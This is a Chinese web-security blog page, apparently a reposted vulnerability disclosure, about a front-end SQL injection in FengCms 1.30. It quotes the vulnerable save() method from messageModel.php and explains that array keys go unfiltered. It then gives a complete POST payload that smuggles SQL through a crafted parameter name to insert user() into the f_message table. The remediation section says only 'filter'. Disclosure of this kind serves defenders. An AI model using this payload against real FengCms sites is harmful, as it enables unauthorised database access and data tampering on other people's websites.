FengCms1.30注入(前台) - 网站安全 - 自学php网-自学php网

FengCms1.30注入(前台) - 网站安全 - 自学php网

来源：未知时间：2015-04-15 13:09 作者：xxadmin 阅读:次

[导读] http://www.fengcms.com/ app\model\messageModel.php public function save($array){if($_SESSION[authnum]!=$array[ vc ode]||$_SESSION[authnum]==){ return array(status = c);exit;}unset($array[vcode]);$re=D($this-d_name)-insert($array);if($re){$_...

http://www.fengcms.com/

app\model\messageModel.php

public function save($array){
if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){ return array('status' => 'c');exit;}
unset($array['vcode']);
$re=D($this->d_name)->insert($array);

if($re){
$_SESSION['authnum']="";
return array('status' => 'y','id' => $re);

}else{

return array('status' => 'n','id' => $re);
}

$re=D($this->d_name)->insert($array); 未对数组key过滤。反引号无视转义。 pyload: POST /?controller=message&operate=save title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319

`解决方案：`

过滤~

Coremail某功能多处存储型XSS漏洞 - 网站安全 - 自学php网

web安全工程师－－成长记录 - 网站安全 - 自学php网

子栏目

FengCms1.30注入(前台) - 网站安全 - 自学php网

`解决方案：`

最新评论

添加评论

更多文章推荐

添加评论